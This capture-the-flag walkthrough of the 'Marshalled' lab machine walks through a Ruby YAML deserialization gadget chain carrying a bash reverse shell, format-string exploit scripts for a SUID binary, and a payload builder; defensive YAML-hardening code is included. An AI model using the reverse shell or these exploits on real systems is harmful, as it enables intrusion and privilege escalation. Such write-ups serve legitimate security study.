PG - Marshalled

In this walkthrough, we will be going through the Marshalled room from Proving Grounds. This room is rated Intermediate on the platform, and it consists of exploiting a blind RCE through YAML deserialization in the Ruby on Rails framework for initial access and a buffer overflow in the cname binary for privilege escalation. So, let’s get started without any delay.

Marshalled

Machine Info:

Title: Marshalled
IP address: 192.168.197.190
Difficulty: Intermediate
OS: Linux
Description: Marshalled is an Intermediate level Linux machine which requires exploitation of a Blind RCE through YAML Deserialization in Ruby on Rails framework for the initial access and a buffer overflow in cname binary for the Privilege Escalation.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only two open ports: 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.228.237
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-02 23:20 IST

Nmap scan report for 192.168.228.237
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/2%OT=22%CT=1%CU=31756%PV=Y%DS=4%DC=T%G=Y%TM=65BD2BC1
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%TS=A)SEQ(SP=106%GCD
OS:=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11
OS:NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE8
OS:8%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)
OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=A365%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   184.01 ms 192.168.45.1
2   183.97 ms 192.168.45.254
3   184.15 ms 192.168.251.1
4   184.18 ms 192.168.228.237

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.09 seconds

nmap scan

  • Added the domain name to my /etc/hosts file

adding domain in /etc/hosts

  • Enumerated the web server on port 80 which reveals a static web page.

marshalled.pg

  • Next, I suspected there might be subdomains related to the current domain, so I performed subdomain brute-forcing using wfuzz, which revealed a subdomain named “monitoring”.

$ wfuzz -u http://marshalled.pg/ -H "Host: FUZZ.marshalled.pg" -w ~/Desktop/Wordlist/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hh 868
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://marshalled.pg/
Total requests: 4989

===================================================================
ID           Response   Lines    Word     Chars       Payload                      
===================================================================

000000346:   200        102 L    266 W    4045 Ch     "monitoring"                 

Total time: 126.7590
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 39.35813

wfuzz subdomain enumeration

  • Added the subdomain to my /etc/hosts file.

adding monitoring.marshalled.pg

  • Accessed the web server on the subdomain, which hosts an “Internal Monitoring Application”.

Internal Monitoring Application

  • Found a login panel on it and got in using a common username and password combination.

login panel

  • The internal dashboard divulges some system information.

internal dashboard

Initial Access:

  • After banging my head against the wall on this for an eternity, I learned that the remember_me parameter on the login page is vulnerable to blind RCE through YAML deserialization in the Ruby on Rails framework. To exploit it, we first intercept the login request and send it to Repeater so we can work with it further.

Burpsuite POST request

302 Found

  • Decode the remember_me token captured in the response above and go through the serialized Ruby object inside it. This reveals the YAML version responsible for the vulnerability.

YAML version found

--- !ruby/object:User
concise_attributes:
- !ruby/object:ActiveModel::Attribute::FromDatabase
  name: id
  value_before_type_cast: 104
- !ruby/object:ActiveModel::Attribute::FromDatabase
  name: username
  value_before_type_cast: admin
- !ruby/object:ActiveModel::Attribute::FromDatabase
  name: password_digest
  value_before_type_cast: "$2a$12$ogjC9QG2BTiLQohzwmR7au3JHj/MwqWsMb2RrsHN7NYilSN.SFejO"
- !ruby/object:ActiveModel::Attribute::FromDatabase
  name: created_at
  value_before_type_cast: '2022-09-13 20:06:13.809506'
- !ruby/object:ActiveModel::Attribute::FromDatabase
  name: updated_at
  value_before_type_cast: '2022-09-13 20:06:13.809506'
new_record: false
active_record_yaml_version: 2
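To make the bug class concrete, the following Ruby snippet is an added example (not code from the room, its application, or the Stratum post) that contrasts an unrestricted YAML load of a base64 cookie, the pattern behind the remember_me issue, with Psych's safe_load and a tag-scanning check useful for log review. The User class and both tokens are constructed stand-ins.

```ruby
require 'yaml'
require 'base64'

# Constructed stand-in for the application's model; the real one is an
# ActiveRecord class with the attributes seen in the decoded token above.
class User
  attr_accessor :username
end

# Constructed remember_me-style token: base64 of a YAML document whose
# !ruby/object tag asks the loader to build a Ruby object.
SAMPLE_TOKEN = Base64.strict_encode64(<<~YAML)
  --- !ruby/object:User
  username: admin
YAML

# Constructed token naming a class the app never serialises into a cookie.
SUSPICIOUS_TOKEN = Base64.strict_encode64(<<~YAML)
  ---
  - !ruby/object:Gem::Installer
    i: x
YAML

# Vulnerable pattern: an unrestricted load honours every !ruby/* tag, so the
# cookie decides which classes get instantiated. This is the primitive the
# gadget chain in the Stratum write-up builds on.
def load_token_unsafe(token)
  doc = Base64.decode64(token)
  # Psych 4 (Ruby 3.1+) made YAML.load safe and added unsafe_load; older
  # Psych had only the unsafe YAML.load.
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened pattern: safe_load builds only core types unless a class is
# explicitly allow-listed, and raises Psych::DisallowedClass otherwise.
def load_token_safe(token, permitted: [])
  YAML.safe_load(Base64.decode64(token), permitted_classes: permitted)
end

# Detection helper: the !ruby/* tags a token would try to resolve.
def ruby_tags(token)
  Base64.decode64(token).scan(%r{!ruby/[\w:]+}).uniq
end

# :clean when the token carries no !ruby/* tags, :expected when every tag
# names an allow-listed class, :suspicious otherwise (worth alerting on).
def classify_token(token, expected_classes: ['User'])
  tags = ruby_tags(token)
  return :clean if tags.empty?
  names = tags.map { |t| t.sub(%r{\A!ruby/\w+:?}, '') }
  names.all? { |n| expected_classes.include?(n) } ? :expected : :suspicious
end

if __FILE__ == $PROGRAM_NAME
  p load_token_unsafe(SAMPLE_TOKEN)
  begin
    load_token_safe(SAMPLE_TOKEN)
  rescue Psych::DisallowedClass => e
    puts "safe_load refused the token: #{e.message}"
  end
  puts classify_token(SAMPLE_TOKEN)      # expected
  puts classify_token(SUSPICIOUS_TOKEN)  # suspicious
end
```

A Rails app that must keep a serialized object in a cookie should use the safe loader with an explicit permitted_classes list, or better, store only an opaque identifier and look the record up server-side.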

  • Now, following the POC below, we generate a YAML file containing our reverse shell payload.

POC: https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

---
 - !ruby/object:Gem::Installer
     i: x
 - !ruby/object:Gem::SpecFetcher
     i: y
 - !ruby/object:Gem::Requirement
   requirements:
     !ruby/object:Gem::Package::TarReader
     io: &1 !ruby/object:Net::BufferedIO
       io: &1 !ruby/object:Gem::Package::TarReader::Entry
          read: 0
          header: "abc"
       debug_output: &1 !ruby/object:Net::WriteAdapter
          socket: &1 !ruby/object:Gem::RequestSet
              sets: !ruby/object:Net::WriteAdapter
                  socket: !ruby/module 'Kernel'
                  method_id: :system
              git_set: bash -c "bash -i >& /dev/tcp/192.168.45.176/9000 0>&1"
          method_id: :resolve

  • We will now encode the yaml file in base64.

cat payload.yml | base64 | tr -d '\t\n\r'


  • Next, we URL-encode it so that it can be carried in the request without any issues.


  • Capture a new request to the dashboard in Burp Suite and place our generated token in the remember_me parameter. Once the request is processed, it grants us a reverse shell on our netcat listener on port 9000.

creating new request with payload

got initial access

  • Captured the local flag as well.

local flag

Privilege Escalation:

  • Next, enumerating the target for SUID binaries in the filesystem reveals an interesting binary named cname.

find / -type f -perm -4000 2>/dev/null

looking for SUID binaries

  • The binary is located at /usr/bin/cname. We transfer it to our attack machine for further analysis.

$ file cname
cname: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=139a42fb679798eb9c9efffaeafbfbb39c60e48b, for GNU/Linux 3.2.0, with debug_info, not stripped

$ checksec cname
<snip>
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

  • We notice the file is a 32-bit binary with PIE disabled, and since it was built with debug info and not stripped, gdb shows us the debugging information.

Viewing the complete source code:

#include "stdio.h"
#include "stdlib.h"
#include "string.h"

char *concat(const char *a, const char *b)
{
    size_t len_a = strlen(a);
    size_t len_b = strlen(b);
    size_t size = len_a + len_b;

    char *s = malloc(size + 1);
    int i;

    for (i = 0; i < len_a; ++i)
        s[i] = a[i];
    for (i = 0; i < len_b; ++i)
        s[len_a + i] = b[i];
    s[size] = 0;
    return s;
}

void log(char *s)
{
    setuid(0);

    char *log_msg = concat("[+] ", s);
    int size = strlen(log_msg) + 2;
    char *buf = malloc(size);
    snprintf(buf, size, "%s\n", log_msg);
    printf(buf);
}

void add(char *entry)
{

    FILE *fd;
    char buffer[256];

    fd = fopen("/etc/hosts", "a");
    if (fd == NULL)
    {
        perror("Error opening file.");
    }
    else
    {
        char *msg = concat("Adding: ", entry);
        log(msg);

        fputs(entry, fd);
        fputs("\n", fd);
        fclose(fd);
    }
}

int main(int argc, char const *argv[])
{

    if (argc < 3)
    {
        printf("error: usage: %s <ip> <cname>\n", argv[0]);
        return 0;
    }

    int size = strlen(argv[1]) + strlen(argv[2]) + 2;

    char buf[size];

    sprintf(buf, "%s %s", argv[1], argv[2]);

    add(buf);

    puts("1 Entry added.");
}

  • We notice a format string vulnerability in the log function:

void log(char *s)
{
    char *log_msg = concat("[+] ", s);
    int size = strlen(log_msg) + 2;
    char *buf = malloc(size);
    snprintf(buf, size, "%s\n", log_msg);
    printf(buf);
}

  • The value of s gets copied into log_msg, which then goes into printf.

  • In order to exploit this, we will use the format string vulnerability to overwrite the GOT entry for puts with the address of the system() function.

  • The final puts() call prints the static string “1 Entry added.”, so once puts has been redirected to system(), the shell will look for a command named 1; we therefore set PATH to a directory containing an executable of our own with that name, which the underlying shell will then execute.

  • We know that the binary does not have PIE enabled, which means that we won’t have to worry about the addresses changing each time the binary reloads.

  • We will attempt to build an exploit locally, starting by disabling ASLR on our own machine:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

  • Now we use the following template for the format strings attack:

#! /usr/bin/env python2
import sys
import struct

def p32(addr):
   return struct.pack('I', addr)

address = 0xdeadbeef

size = 500

addr = "AAAA" +  p32(address+0) + "BBBB" +  p32(address+1) + "CCCC" +  p32(address+2) + "DDDD" +  p32(address+3)

stack_pop_sequence = '%x.'*130

# TODO: replace |%x| with |%n|
write = "%000x|%x|%000x|%x|%000x|%x|%000x|%x|"

padding = size - len(addr + stack_pop_sequence + write)

print (addr + stack_pop_sequence + write + padding * "A")

  • Next, we will try to find the offset of the printf stack pointer.

  • We increase the length of the stack pop sequence until we find the value AAAA on the stack.

  • The output for 130:

./cname BBB $(python2 test.py)
[+] Adding: BBB AAAAᆳBBBBCCCCDDDD206.804a00d.804d4f0.8.804d4f0.206.804d700.804a013.804c000.ffffc448.80494d0.804d2e0.ffffc460.ffffc460.804944e.ffffc35c.804a05b.ffffc458.ffffc460.ffffc35c.804d1a0.804d2e0.ffffc460.0.1.804a05b.ffffc458.f7ffd000.7.1.fbad8001.ffffc460.ffffc460.ffffc460.ffffc460.ffffc658.ffffffff.ffffc460.ffffffff.0.0.0.0.0.ffffffff.0.f7db4c9c.f7000000.0.0.f7fde278.f7ffd590.ffffffff.0.0.4.ffffffff.0.8048362.804c038.f7fe184e.8048362.f7ffd990.ffffc414.f7ffdb50.f7fc9410.1.f7f999c0.0.f7fd1390.27992c00.f7ffd000.8048348.f7e1e7dd.804c000.3.ffffc660.ffffc698.f7e00330.ffffc460.ffffffff.804a05b.ffffc458.0.f7fe7ae4.ffffc972.27992c00.804a05b.804c000.ffffc698.804965b.ffffc460.804a05b.ffffc96e.ffffc972.20424242.41414141.deadbeef.42424242.deadbef0.43434343.deadbef1.44444444.deadbef2.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e|252e7825|78252e78|2e78252e|252e7825|78252e78|2e78252e|252e7825|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
1 Entry added.

  • We will decrease this value until we get |deadbeef|, and retrieve 96 as the offset:

./cname BBB $(python2 test.py)
[+] Adding: BBB AAAAᆳBBBBCCCCDDDD206.804a00d.804d4f0.8.804d4f0.206.804d700.804a013.804c000.ffffc448.80494d0.804d2e0.ffffc460.ffffc460.804944e.ffffc35c.804a05b.ffffc458.ffffc460.ffffc35c.804d1a0.804d2e0.ffffc460.0.1.804a05b.ffffc458.f7ffd000.7.1.fbad8001.ffffc460.ffffc460.ffffc460.ffffc460.ffffc658.ffffffff.ffffc460.ffffffff.0.0.0.0.0.ffffffff.0.f7db4c9c.f7000000.0.0.f7fde278.f7ffd590.ffffffff.0.0.4.ffffffff.0.8048362.804c038.f7fe184e.8048362.f7ffd990.ffffc414.f7ffdb50.f7fc9410.1.f7f999c0.0.f7fd1390.b146af00.f7ffd000.8048348.f7e1e7dd.804c000.3.ffffc660.ffffc698.f7e00330.ffffc460.ffffffff.804a05b.ffffc458.0.f7fe7ae4.ffffc972.b146af00.804a05b.804c000.ffffc698.804965b.ffffc460.804a05b.ffffc96e.ffffc972.20424242.41414141|deadbeef|42424242|deadbef0|43434343|deadbef1|44444444|deadbef2|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  • From here the goal should be clear: printf walks an internal argument pointer up the stack as it consumes conversions, so after 96 pops that pointer sits on the four-byte AAAA marker and the very next conversion reads the address we planted right behind it. A %n at that position writes through that address.

  • In this case we want to overwrite the GOT entry of puts, which we find using objdump (-R lists the dynamic relocations, and the R_386_JUMP_SLOT address is the one we need):

$ objdump -TR cname |grep puts
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   fputs
0804c020 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c03c R_386_JUMP_SLOT   fputs@GLIBC_2.0

  • The address we want is: 0x0804c020.

  • Now we retrieve the address of system. The binary is dynamically linked, so libc is only mapped once the program is running: set a breakpoint on main, run, then print the symbol. Keep in mind that gdb disables ASLR by default; a hard-coded libc address like this only works on the target if ASLR is off there as well (check /proc/sys/kernel/randomize_va_space). The target's libc maps system elsewhere, which is why the value is re-derived on the remote box later.

gdb-peda$ b main
gdb-peda$ r
<snip>
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7df1780 <system>

  • We will update our exploit script:

#! /usr/bin/env python2
import sys
import struct

def p32(addr):
   # explicit little-endian so the pointer bytes land in stack order on x86
   return struct.pack('<I', addr)

address = 0x0804c020 # puts@got

value = 0xf7df1780 # system (from gdb, ASLR off)

size = 500

# four 4-byte markers, each followed by a pointer to one byte of puts@got;
# a marker prints as 8 hex digits and is what the %x before each %n consumes
addr = "AAAA" +  p32(address+0) + "BBBB" +  p32(address+1) + "CCCC" +  p32(address+2) + "DDDD" +  p32(address+3)

# 96 pops bring printf's argument pointer onto the AAAA marker
stack_pop_sequence = '%x.'*96

# TODO: replace |%x| with |%n|
write = "%000x|%x|%000x|%x|%000x|%x|%000x|%x|"

padding = size - len(addr + stack_pop_sequence + write)

suffix = "AAA"

print (addr + stack_pop_sequence + write + padding * "A"+ suffix)

  • We next check whether we can overwrite the address by replacing the first %x after the marker with %n:

write = "%000x|%n|%000x|%x|%000x|%x|%000x|%x|"

  • We have to be careful here: the target address 0x0804c020 ends in the byte 0x20, a space, and an unquoted $(...) undergoes word splitting, so the shell would chop our payload into several arguments.

  • To avoid that we quote the command substitution:

$ ./cname BBB "$(python2 test.py)"

  • The binary now segfaults: puts@GOT holds whatever count %n stored, so the next call to puts jumps there. Opening it in gdb confirms we control the instruction pointer.

[screenshot: crash in gdb after the %n write]

  • %n stores the number of characters printed so far into the int that the next argument points to. We planted four consecutive pointers (address+0 to address+3), so we write the target value 0xf7df1780 one byte at a time, least significant byte first; each %n writes a full 4-byte count, but only its low byte has to be right, because the next write overwrites the bytes above it. The job is therefore to make the low byte of printf's counter equal 0x80, 0x17, 0xdf and 0xf7 in turn.

  • From the screenshot, the low byte of the count after the first %000x| is 0xe5, and we need 0x80, which is smaller, so the counter has to wrap: only the low byte matters, modulo 256.

  • We start by widening the first %x to 150 characters (it printed 8 before, so this adds 142), which leaves a low byte of 0x73:

write = "%150x|%n|%000x|%x|%000x|%x|%000x|%x|"

[screenshot: Invalid address]

  • Now we add 0x80 - 0x73 = 13, for a width of 163:

write = "%163x|%n|%000x|%x|%000x|%x|%000x|%x|"

[screenshot: Invalid address]

  • From the output we have the correct byte.

  • We apply the same procedure to the remaining three bytes (0x17, 0xdf, 0xf7), each time computing the width from the low byte left behind by the previous write, which gives:

write = "%163x|%n|%149x|%n|%198x|%n|%022x|%n|"

  • and we get the following familiar error:

[screenshot: shell error after the redirected puts call]

  • puts@GOT now points at system, so the string the program hands to puts is executed as a shell command. Judging from the "1 Entry added." message printed earlier, the first word of that string is 1, so we create an executable named 1 in a directory we prepend to PATH:

$ cat 1
sh
$ chmod +x 1
$ export PATH=$(pwd):$PATH

  • and we get a root shell back:

[screenshot: root shell]

  • All that's left is to adjust the exploit to the remote environment using the same method: the address of system is taken from gdb on the target, and the four widths are recomputed there, because the stack contents, and with them printf's starting count, differ from our local box:

#! /usr/bin/env python2
import sys
import struct

def p32(addr):
   # explicit little-endian so the pointer bytes land in stack order on x86
   return struct.pack('<I', addr)

address = 0x0804c020 # puts@got

value = 0xf7dcdcb0 # system on the target

size = 500

# four 4-byte markers, each followed by a pointer to one byte of puts@got
addr = "AAAA" +  p32(address+0) + "BBBB" +  p32(address+1) + "CCCC" +  p32(address+2) + "DDDD" +  p32(address+3)

# 96 pops bring printf's argument pointer onto the AAAA marker
stack_pop_sequence = '%x.'*96

# widths recomputed on the target with the same byte-by-byte procedure
write = "%199x|%n|%042x|%n|%254x|%n|%025x|%n|"

padding = size - len(addr + stack_pop_sequence + write)

suffix = "AAA"

print (addr + stack_pop_sequence + write + padding * "A"+ suffix)

  • We run the script and have successfully obtained root access.

[screenshot: proof flag]
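The byte-by-byte arithmetic above, repeated once more for the remote widths, is easy to get wrong by hand. The Python 3 script below is an added example and not the walkthrough's own code: it derives the four widths from the target value and the counter's starting low byte, cross-checks them against a small model of printf's character counter, and assembles the full 500-byte payload in the same layout as the scripts above. It assumes the layout established on this page (96 pops to the AAAA marker, markers that print as 8 hex digits, one %{w}x|%n| chunk per byte); the local baseline comes from the observed 0xe5, while the remote baseline 0xe8 is not shown on the page but derived by working backwards from the remote widths. The file name fmtwidths.py is my own choice.

```python
#!/usr/bin/env python3
"""Width calculator and payload builder for the cname format-string write.

Added example, not the walkthrough's script. Assumed layout (as on the page):
96 "%x." pops move printf's argument pointer onto the AAAA marker, each
4-byte marker prints as 8 hex digits, and the write part is four
"%{width}x|%n|" chunks, one per byte of the value, stored little-endian
into puts@got .. puts@got+3.
"""
import struct
import sys

MARKERS = (b"AAAA", b"BBBB", b"CCCC", b"DDDD")
MARKER_HEX_LEN = 8          # %x on 0x41414141 prints "41414141": 8 characters
POP_COUNT = 96              # pops found by trial on the page
PUTS_GOT = 0x0804C020
SYSTEM_LOCAL = 0xF7DF1780
SYSTEM_REMOTE = 0xF7DCDCB0

# Observed on the page: after the first "%000x|" the low byte of the count was
# 0xe5, i.e. 8 hex digits plus "|" on top of the baseline.
LOCAL_BASELINE = (0xE5 - MARKER_HEX_LEN - 1) & 0xFF     # 0xdc
# Assumption: working backwards from the page's remote widths gives 0xe8.
REMOTE_BASELINE = 0xE8


def p32(value):
    return struct.pack("<I", value)         # explicit little-endian


def fmt_widths(value, baseline):
    """Return four %x widths so that successive %n writes store the bytes of
    `value` (little-endian) into addr+0 .. addr+3.

    `baseline` is the low byte of printf's character count just before the
    first "%{w}x|%n|" chunk. Only the low byte matters: each %n stores a
    4-byte count, but the following write overwrites the bytes above it.
    """
    widths = []
    count = baseline & 0xFF
    for target in value.to_bytes(4, "little"):
        # "%{w}x" adds w characters, "|" adds one more, then %n stores the count
        w = (target - count - 1) % 256
        if w < MARKER_HEX_LEN:
            w += 256    # %x cannot print fewer than the marker's 8 hex digits
        widths.append(w)
        count = (target + 1) & 0xFF   # %n stored `target`; the trailing "|" adds one
    return widths


def simulate_writes(widths, baseline):
    """Model printf's counter over the four chunks and return the low byte each
    %n would store; used to cross-check fmt_widths."""
    count = baseline & 0xFF
    written = []
    for w in widths:
        count = (count + max(w, MARKER_HEX_LEN) + 1) & 0xFF   # "%{w}x" then "|"
        written.append(count)                                  # %n stores it
        count = (count + 1) & 0xFF                             # "|" after %n
    return bytes(written)


def build_payload(got_addr, value, baseline, size=500):
    """Markers+pointers, the pops, the write chunks and padding, in the same
    structure as the walkthrough's script (500 bytes plus the "AAA" suffix)."""
    addr = b"".join(m + p32(got_addr + i) for i, m in enumerate(MARKERS))
    pops = b"%x." * POP_COUNT
    write = b"".join(b"%%%dx|%%n|" % w for w in fmt_widths(value, baseline))
    body = addr + pops + write
    if len(body) > size:
        raise ValueError("payload longer than the %d-byte buffer" % size)
    return body + b"A" * (size - len(body)) + b"AAA"


def needs_quoting(payload):
    """True if an unquoted $(...) would word-split the payload (0x20 in
    puts@got is exactly the case hit on the page). A NUL byte can never be
    passed through argv, so that is an error rather than a quoting issue."""
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte")
    return any(c in b" \t\n" for c in payload)


if __name__ == "__main__":
    remote = "remote" in sys.argv[1:]
    target = SYSTEM_REMOTE if remote else SYSTEM_LOCAL
    base = REMOTE_BASELINE if remote else LOCAL_BASELINE
    sys.stdout.buffer.write(build_payload(PUTS_GOT, target, base))
```

Run as python3 fmtwidths.py > payload (add the word remote for the target's values) and pass the result quoted, exactly as above, since needs_quoting reports the 0x20 byte. The widths it emits are the page's 163, 149, 198 and 22 locally and 199, 42, 254 and 25 for the remote baseline; it writes them as %22x rather than %022x, which changes only the padding character, not the character count. If a recomputed width comes out below 8 it is bumped by 256, because the marker's 8 hex digits are printed regardless of a smaller width. The hard-coded system address still only holds while ASLR is off on the box you run it against.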


Conclusion:

So that was "Marshalled" for you. We started off with a regular nmap scan and found two open ports, 22 (SSH) and 80 (HTTP). Subdomain enumeration via wfuzz found monitoring.marshalled.pg. The login panel on that subdomain has a remember-me option that sets an interesting cookie; decoding the remember token revealed the YAML version in use, which is vulnerable to blind RCE through YAML deserialization in the Ruby on Rails framework, and a PoC gave us initial access on the target. Enumerating the target for SUID binaries revealed an interesting binary named cname. For privilege escalation, we exploited the format string bug in cname, using %n to overwrite the GOT entry of puts with the address of system, to get root on the target. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
